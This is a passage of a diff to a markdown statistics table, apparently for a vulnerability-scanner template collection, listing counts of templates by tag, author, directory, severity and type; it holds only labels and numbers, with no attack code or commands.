darkstat | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| smi | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| perl | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| camunda | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| kong | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| sar2html | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| processmaker | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| elascticsearch | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| simplecrm | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| netsweeper | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| tracer | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| sgp | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| argussurveillance | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| cve2006 | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| dbeaver | 1 | | | | | | | | | -| xmlchart | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| iceflow | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| owa | 1 | | | | | | | | | -| asus | 1 | 
| | | | | | | | -| monitorix | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| eyelock | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| oneblog | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| acontent | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| couchbase | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| manageengine | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| commax | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| resourcespace | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| announcekit | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| nweb2fax | 1 | | | | | | | | | -| websvn | 1 | 
| | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| wondercms | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| getsimple | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| openx | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| cves2016 | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | -| netmask | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| azkaban | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| lg-nas | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| tectuus | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| yealink | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| iptime | 1 | | | | | | | | | -| cofax | 1 | | | | | | | | | -| spring | 1 
| | | | | | | | | -| javafaces | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| gotmls | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| graphite | 1 | | | | | | | | | -| ghost | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| aruba | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| tieline | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| pcoip | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| ilo | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| adb | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| gogs | 1 | | | 
| | | | | | -| nps | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| craftcms | 1 | | | | | | | | | -| bigbluebutton | 1 | | | | | | | | | -| whm | 1 | | | | | | | | | -| meraki | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| qsan | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| logontracer | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| bruteforce | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| netgenie | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| +| cve | 690 | dhiyaneshdk | 252 | cves | 696 | info | 625 | http | 1904 | +| lfi | 250 | pikpikcu | 250 | vulnerabilities | 291 | high | 540 | file | 46 | +| panel | 248 | daffainfo | 199 | exposed-panels | 247 | medium | 428 | network | 41 | +| xss | 227 | pdteam | 195 | exposures | 186 | critical | 267 | dns | 11 | +| exposure | 226 | geeknik | 151 | technologies | 178 | low | 147 | | | +| wordpress | 207 | dwisiswant0 | 132 | misconfiguration | 131 | | | | | +| rce | 195 | gy741 | 72 | takeovers | 63 | | | | | +| tech | 169 | madrobot | 62 | default-logins | 56 | | | | | +| cve2020 | 160 | princechaddha | 60 | file | 46 | | | | | +| wp-plugin | 140 | pussycat0x | 58 | workflows | 36 | | | | | +| cve2021 | 115 | gaurang | 42 | network | 32 | | | | | +| cve2019 | 93 | 0x_akoko | 33 | miscellaneous | 24 | | | | | +| config | 93 | ice3man | 26 | iot | 23 | | | | | +| cve2018 | 82 | organiccrap | 24 | dns | 11 | | | | | +| joomla | 74 | philippedelteil | 23 | cnvd | 9 | | | | | +| apache | 68 | sheikhrishad | 15 | fuzzing | 9 | | 
| | | +| takeover | 66 | milo2012 | 14 | headless | 5 | | | | | +| token | 65 | techbrunchfr | 13 | | | | | | | +| cve2010 | 64 | pr3r00t | 13 | | | | | | | +| default-login | 63 | suman_kar | 12 | | | | | | | +| iot | 62 | cyllective | 11 | | | | | | | +| oob | 51 | r3dg33k | 11 | | | | | | | +| cve2017 | 49 | random_robbie | 10 | | | | | | | +| file | 46 | wdahlenb | 10 | | | | | | | +| unauth | 45 | righettod | 10 | | | | | | | +| network | 41 | nadino | 9 | | | | | | | +| sqli | 38 | hackergautam | 9 | | | | | | | +| | 36 | melbadry9 | 9 | | | | | | | +| oracle | 36 | that_juan_ | 8 | | | | | | | +| ssrf | 35 | aashiq | 8 | | | | | | | +| cve2016 | 32 | iamthefrogy | 8 | | | | | | | +| logs | 30 | techryptic (@tech) | 7 | | | | | | | +| redirect | 30 | oppsec | 7 | | | | | | | +| jira | 28 | randomstr1ng | 7 | | | | | | | +| atlassian | 27 | dogasantos | 7 | | | | | | | +| listing | 25 | emadshanab | 7 | | | | | | | +| misc | 23 | dr_set | 7 | | | | | | | +| disclosure | 21 | 0x240x23elu | 7 | | | | | | | +| cve2015 | 21 | kophjager007 | 7 | | | | | | | +| auth-bypass | 20 | harshbothra_ | 7 | | | | | | | +| generic | 20 | puzzlepeaches | 6 | | | | | | | +| router | 19 | __fazal | 6 | | | | | | | +| aem | 19 | meme-lord | 6 | | | | | | | +| cisco | 19 | caspergn | 6 | | | | | | | +| sap | 18 | logicalhunter | 6 | | | | | | | +| springboot | 17 | yanyun | 5 | | | | | | | +| debug | 16 | elsfa7110 | 5 | | | | | | | +| cve2014 | 15 | iamnoooob | 5 | | | | | | | +| misconfig | 15 | pentest_swissky | 5 | | | | | | | +| cve2011 | 14 | panch0r3d | 5 | | | | | | | +| weblogic | 14 | joanbono | 5 | | | | | | | +| cve2012 | 14 | rootxharsh | 5 | | | | | | | +| login | 14 | ganofins | 5 | | | | | | | +| android | 13 | lu4nx | 4 | | | | | | | +| php | 13 | xelkomy | 4 | | | | | | | +| struts | 13 | github.com/its0x08 | 4 | | | | | | | +| fuzz | 13 | e_schultze_ | 4 | | | | | | | +| adobe | 13 | nodauf | 4 | | | | | | | +| devops | 13 | jarijaas | 3 | | | | | | | +| jenkins 
| 12 | binaryfigments | 3 | | | | | | | +| dlink | 12 | mavericknerd | 3 | | | | | | | +| dns | 12 | impramodsargar | 3 | | | | | | | +| cve2013 | 11 | vsh00t | 3 | | | | | | | +| zoho | 11 | yash anand @yashanand155 | 3 | | | | | | | +| dell | 10 | johnk3r | 3 | | | | | | | +| aws | 10 | dudez | 3 | | | | | | | +| xxe | 9 | shifacyclewala | 3 | | | | | | | +| magento | 9 | 0w4ys | 3 | | | | | | | +| ftp | 9 | incogbyte | 3 | | | | | | | +| airflow | 8 | z3bd | 3 | | | | | | | +| ruijie | 8 | skeltavik | 3 | | | | | | | +| cnvd | 8 | emenalf | 3 | | | | | | | +| nginx | 8 | idealphase | 3 | | | | | | | +| scada | 8 | tess | 3 | | | | | | | +| rails | 8 | _generic_human_ | 3 | | | | | | | +| intrusive | 8 | shine | 3 | | | | | | | +| gitlab | 8 | f1tz | 3 | | | | | | | +| vmware | 7 | thomas_from_offensity | 3 | | | | | | | +| cve2009 | 7 | fyoorer | 3 | | | | | | | +| kubernetes | 7 | hetroublemakr | 2 | | | | | | | +| confluence | 7 | ree4pwn | 2 | | | | | | | +| backup | 7 | koti2 | 2 | | | | | | | +| coldfusion | 7 | bing0o | 2 | | | | | | | +| ibm | 7 | cocxanh | 2 | | | | | | | +| google | 7 | swissky | 2 | | | | | | | +| cms | 7 | 0xprial | 2 | | | | | | | +| netgear | 7 | dheerajmadhukar | 2 | | | | | | | +| files | 7 | lotusdll | 2 | | | | | | | +| rconfig | 6 | whoever | 2 | | | | | | | +| jetty | 6 | w4cky_ | 2 | | | | | | | +| solr | 6 | arcc | 2 | | | | | | | +| laravel | 6 | amsda | 2 | | | | | | | +| citrix | 6 | randomrobbie | 2 | | | | | | | +| django | 6 | alifathi-h1 | 2 | | | | | | | +| api | 6 | davidmckennirey | 2 | | | | | | | +| cve2008 | 6 | moritz nentwig | 2 | | | | | | | +| docker | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| nodejs | 5 | random-robbie | 2 | | | | | | | +| drupal | 5 | joeldeleep | 2 | | | | | | | +| wp-theme | 5 | socketz | 2 | | | | | | | +| java | 5 | mohammedsaneem | 2 | | | | | | | +| deserialization | 5 | 0xsapra | 2 | | | | | | | +| tomcat | 5 | udit_thakkur | 2 | | | | | | | +| iis | 5 | huowuzhao | 2 | | 
| | | | | +| jolokia | 5 | ehsahil | 2 | | | | | | | +| lucee | 5 | x1m_martijn | 2 | | | | | | | +| printer | 5 | parth | 2 | | | | | | | +| circarlife | 5 | 0xcrypto | 2 | | | | | | | +| ssti | 5 | r3naissance | 2 | | | | | | | +| microsoft | 5 | gal nagli | 2 | | | | | | | +| windows | 5 | unstabl3 | 2 | | | | | | | +| fileupload | 5 | hahwul | 2 | | | | | | | +| phpmyadmin | 5 | kiblyn11 | 2 | | | | | | | +| headless | 5 | convisoappsec | 2 | | | | | | | +| dedecms | 5 | 0xrudra | 2 | | | | | | | +| strapi | 4 | nkxxkn | 2 | | | | | | | +| proxy | 4 | fabaff | 2 | | | | | | | +| exchange | 4 | manas_harsh | 2 | | | | | | | +| grafana | 4 | afaq | 2 | | | | | | | +| hp | 4 | pxmme1337 | 2 | | | | | | | +| webserver | 4 | sushantkamble | 2 | | | | | | | +| vpn | 4 | g4l1t0 | 2 | | | | | | | +| asp | 4 | zomsop82 | 2 | | | | | | | +| crlf | 4 | bsysop | 2 | | | | | | | +| hongdian | 4 | foulenzer | 2 | | | | | | | +| traversal | 4 | johnjhacking | 2 | | | | | | | +| thinkphp | 4 | vavkamil | 2 | | | | | | | +| symfony | 4 | gevakun | 2 | | | | | | | +| elastic | 4 | bp0lr | 2 | | | | | | | +| symantec | 4 | 0xelkomy | 2 | | | | | | | +| moodle | 4 | un-fmunozs | 1 | | | | | | | +| zimbra | 4 | b0rn2r00t | 1 | | | | | | | +| glpi | 4 | mubassirpatel | 1 | | | | | | | +| buffalo | 4 | yavolo | 1 | | | | | | | +| solarwinds | 4 | shifacyclewla | 1 | | | | | | | +| artifactory | 4 | deena | 1 | | | | | | | +| firmware | 4 | akash.c | 1 | | | | | | | +| magmi | 4 | absshax | 1 | | | | | | | +| wso2 | 4 | c3l3si4n | 1 | | | | | | | +| thinkcmf | 4 | geraldino2 | 1 | | | | | | | +| resin | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| samsung | 4 | kishore krishna (sillydaddy) | 1 | | | | | | | +| cacti | 3 | mah3sec_ | 1 | | | | | | | +| druid | 3 | andysvints | 1 | | | | | | | +| zabbix | 3 | ahmed sherif | 1 | | | | | | | +| ofbiz | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| kevinlab | 3 | remonsec | 1 | | | | | | | +| kibana | 3 | elder tao | 1 | | | 
| | | | +| opensis | 3 | sicksec | 1 | | | | | | | +| linkerd | 3 | shreyapohekar | 1 | | | | | | | +| bypass | 3 | fmunozs | 1 | | | | | | | +| microstrategy | 3 | vzamanillo | 1 | | | | | | | +| smtp | 3 | andirrahmani1 | 1 | | | | | | | +| mongodb | 3 | j3ssie/geraldino2 | 1 | | | | | | | +| zhiyuan | 3 | bernardo rodrigues | 1 | | | | | | | +| | | @bernardofsr | andré monteiro | | | | | | | | +| | | @am0nt31r0 | | | | | | | | +| prometheus | 3 | streetofhackerr007 | 1 | | | | | | | +| r-seenet | 3 | blckraven | 1 | | | | | | | +| springcloud | 3 | co0nan | 1 | | | | | | | +| targa | 3 | @dwisiswant0 | 1 | | | | | | | +| ssh | 3 | kba@sogeti_esec | 1 | | | | | | | +| terramaster | 3 | iampritam | 1 | | | | | | | +| openssh | 3 | b0yd | 1 | | | | | | | +| bigip | 3 | @github.com/defr0ggy | 1 | | | | | | | +| telerik | 3 | jeya seelan | 1 | | | | | | | +| nacos | 3 | ringo | 1 | | | | | | | +| injection | 3 | revblock | 1 | | | | | | | +| camera | 3 | udyz | 1 | | | | | | | +| itop | 3 | s1r1u5_ | 1 | | | | | | | +| httpd | 3 | yashanand155 | 1 | | | | | | | +| log | 3 | naglinagli | 1 | | | | | | | +| firebase | 3 | tim_koopmans | 1 | | | | | | | +| lfr | 3 | ajaysenr | 1 | | | | | | | +| fpd | 3 | ooooooo_q | 1 | | | | | | | +| jellyfin | 3 | thezakman | 1 | | | | | | | +| mail | 3 | alex | 1 | | | | | | | +| caucho | 3 | kabirsuda | 1 | | | | | | | +| fanruan | 3 | petruknisme | 1 | | | | | | | +| vbulletin | 3 | omarkurt | 1 | | | | | | | +| amazon | 3 | knassar702 | 1 | | | | | | | +| kafka | 3 | divya_mudgal | 1 | | | | | | | +| slack | 3 | patralos | 1 | | | | | | | +| nosqli | 3 | d0rkerdevil | 1 | | | | | | | +| backups | 3 | fopina | 1 | | | | | | | +| git | 3 | toufik airane | 1 | | | | | | | +| bitrix | 3 | luci | 1 | | | | | | | +| nexus | 3 | undefl0w | 1 | | | | | | | +| openam | 3 | thevillagehacker | 1 | | | | | | | +| ebs | 3 | exploitation | 1 | | | | | | | +| tikiwiki | 3 | sshell | 1 | | | | | | | +| npm | 3 | bad5ect0r | 1 | | | | | | | +| oa 
| 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| oauth | 2 | bernardofsr | 1 | | | | | | | +| backdoor | 2 | 0xrod | 1 | | | | | | | +| nextjs | 2 | x6263 | 1 | | | | | | | +| axis2 | 2 | pdp | 1 | | | | | | | +| yapi | 2 | defr0ggy | 1 | | | | | | | +| sonarqube | 2 | taielab | 1 | | | | | | | +| igs | 2 | sullo | 1 | | | | | | | +| prestashop | 2 | intx0x80 | 1 | | | | | | | +| leak | 2 | b4uh0lz | 1 | | | | | | | +| paloalto | 2 | 0xteles | 1 | | | | | | | +| adminer | 2 | izn0u | 1 | | | | | | | +| middleware | 2 | regala_ | 1 | | | | | | | +| splunk | 2 | bjhulst | 1 | | | | | | | +| trixbox | 2 | mesaglio | 1 | | | | | | | +| axis | 2 | sec_hawk | 1 | | | | | | | +| odoo | 2 | whynotke | 1 | | | | | | | +| maian | 2 | 0h1in9e | 1 | | | | | | | +| favicon | 2 | philippdelteil | 1 | | | | | | | +| azure | 2 | furkansenan | 1 | | | | | | | +| seeyon | 2 | j33n1k4 | 1 | | | | | | | +| wordfence | 2 | kre80r | 1 | | | | | | | +| idrac | 2 | zhenwarx | 1 | | | | | | | +| icewarp | 2 | alph4byt3 | 1 | | | | | | | +| cve2005 | 2 | ohlinge | 1 | | | | | | | +| rockethchat | 2 | _darrenmartyn | 1 | | | | | | | +| db | 2 | push4d | 1 | | | | | | | +| waf | 2 | 52971 | 1 | | | | | | | +| voipmonitor | 2 | makyotox | 1 | | | | | | | +| nagios | 2 | luskabol | 1 | | | | | | | +| liferay | 2 | ldionmarcil | 1 | | | | | | | +| storage | 2 | ilovebinbash | 1 | | | | | | | +| ilo | 2 | sy3omda | 1 | | | | | | | +| chamilo | 2 | cookiehanhoan | 1 | | | | | | | +| openfire | 2 | wabafet | 1 | | | | | | | +| huawei | 2 | manuelbua | 1 | | | | | | | +| frp | 2 | gboddin | 1 | | | | | | | +| hashicorp | 2 | aresx | 1 | | | | | | | +| shellshock | 2 | _harleo | 1 | | | | | | | +| xxljob | 2 | flag007 | 1 | | | | | | | +| spark | 2 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| smb | 2 | soyelmago | 1 | | | | | | | +| flir | 2 | apt-mirror | 1 | | | | | | | +| saltstack | 2 | berkdusunur | 1 | | | | | | | +| sonicwall | 2 | borna nematzadeh | 1 
| | | | | | | +| globalprotect | 2 | kurohost | 1 | | | | | | | +| hjtcloud | 2 | hanlaomo | 1 | | | | | | | +| glassfish | 2 | willd96 | 1 | | | | | | | +| node | 2 | retr0 | 1 | | | | | | | +| ucmdb | 2 | hakluke | 1 | | | | | | | +| dos | 2 | mass0ma | 1 | | | | | | | +| couchdb | 2 | _c0wb0y_ | 1 | | | | | | | +| akkadian | 2 | shelld3v | 1 | | | | | | | +| cache | 2 | tirtha_mandal | 1 | | | | | | | +| mcafee | 2 | pudsec | 1 | | | | | | | +| hasura | 2 | becivells | 1 | | | | | | | +| rstudio | 2 | th3.d1p4k | 1 | | | | | | | +| guacamole | 2 | ipanda | 1 | | | | | | | +| hoteldruid | 2 | affix | 1 | | | | | | | +| jeedom | 2 | sickwell | 1 | | | | | | | +| hostheader-injection | 2 | evolutionsec | 1 | | | | | | | +| natshell | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| kong | 2 | notsoevilweasel | 1 | | | | | | | +| nextcloud | 2 | chron0x | 1 | | | | | | | +| status | 2 | ratnadip gajbhiye | 1 | | | | | | | +| fortios | 2 | rodnt | 1 | | | | | | | +| keycloak | 2 | mhdsamx | 1 | | | | | | | +| grav | 2 | ahmetpergamum | 1 | | | | | | | +| mida | 2 | infosecsanyam | 1 | | | | | | | +| ecology | 2 | me9187 | 1 | | | | | | | +| prtg | 2 | qlkwej | 1 | | | | | | | +| jboss | 2 | akshansh | 1 | | | | | | | +| jsf | 2 | raesene | 1 | | | | | | | +| webcam | 2 | noamrathaus | 1 | | | | | | | +| phpcollab | 2 | daviey | 1 | | | | | | | +| geowebserver | 2 | micha3lb3n | 1 | | | | | | | +| netis | 2 | rojanrijal | 1 | | | | | | | +| akamai | 2 | schniggie | 1 | | | | | | | +| showdoc | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| chiyu | 2 | elmahdi | 1 | | | | | | | +| service | 2 | smaranchand | 1 | | | | | | | +| hpe | 2 | yashgoti | 1 | | | | | | | +| cve2007 | 2 | 0xtavian | 1 | | | | | | | +| ec2 | 2 | nytr0gen | 1 | | | | | | | +| emerge | 2 | aceseven (digisec360) | 1 | | | | | | | +| pega | 2 | kareemse1im | 1 | | | | | | | +| rockmongo | 2 | adrianmf | 1 | | | | | | | +| 
dolibarr | 2 | alperenkesk | 1 | | | | | | | +| netsweeper | 2 | bolli95 | 1 | | | | | | | +| harbor | 2 | pratik khalane | 1 | | | | | | | +| bucket | 2 | 0ut0fb4nd | 1 | | | | | | | +| avantfax | 2 | zandros0 | 1 | | | | | | | +| yii | 2 | juicypotato1 | 1 | | | | | | | +| vrealize | 2 | its0x08 | 1 | | | | | | | +| activemq | 2 | jteles | 1 | | | | | | | +| github | 2 | dawid-czarnecki | 1 | | | | | | | +| plesk | 2 | | | | | | | | | +| sharepoint | 2 | | | | | | | | | +| kentico | 2 | | | | | | | | | +| totemomail | 2 | | | | | | | | | +| horde | 2 | | | | | | | | | +| bruteforce | 2 | | | | | | | | | +| expose | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| listserv | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| micrsoft | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| tor | 1 | | | 
| | | | | | +| phpwiki | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| chyrp | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| artica | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| wing-ftp | 1 | | 